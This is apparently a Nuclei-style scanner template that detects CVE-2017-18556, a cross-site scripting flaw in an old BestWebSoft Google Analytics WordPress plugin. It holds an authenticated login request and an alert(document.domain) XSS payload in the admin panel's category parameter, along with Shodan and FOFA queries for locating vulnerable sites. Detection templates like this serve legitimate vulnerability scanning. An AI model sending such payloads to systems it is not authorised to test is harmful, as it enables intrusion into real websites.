57 lines
2.2 KiB
YAML
57 lines
2.2 KiB
YAML
id: CVE-2017-18556
|
|
|
|
info:
|
|
name: Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting
|
|
author: luisfelipe146
|
|
severity: medium
|
|
description: |
|
|
The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues.
|
|
remediation: Fixed in version 1.7.1
|
|
reference:
|
|
- https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-18556
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18556
|
|
- https://wordpress.org/plugins/bws-google-analytics/#developers
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2017-18556
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00088
|
|
epss-percentile: 0.3753
|
|
cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 3
|
|
vendor: bestwebsoft
|
|
product: google_analytics
|
|
framework: wordpress
|
|
shodan-query: http.html:/wp-content/plugins/bws-google-analytics/
|
|
fofa-query: body=/wp-content/plugins/bws-google-analytics/
|
|
publicwww-query: "/wp-content/plugins/bws-google-analytics/"
|
|
tags: cve2017,cve,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated,bestwebsoft
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /wp-login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
- |
|
|
GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code_2 == 200'
|
|
- 'contains(header_2, "text/html")'
|
|
- 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")'
|
|
- 'contains(body_3, "Google Analytics by BestWebSoft")'
|
|
condition: and
|
|
# digest: 4b0a00483046022100f1d8dff14b510f9f76ca38b26ce1576d6fa9d581a219f4b0de8e9d69c0e1ca790221008ff36e7393e2e657a067c86ce074b2b43daef945d13218e20a25e1f662311311:922c64590222798bb761d5b6d8e72950 |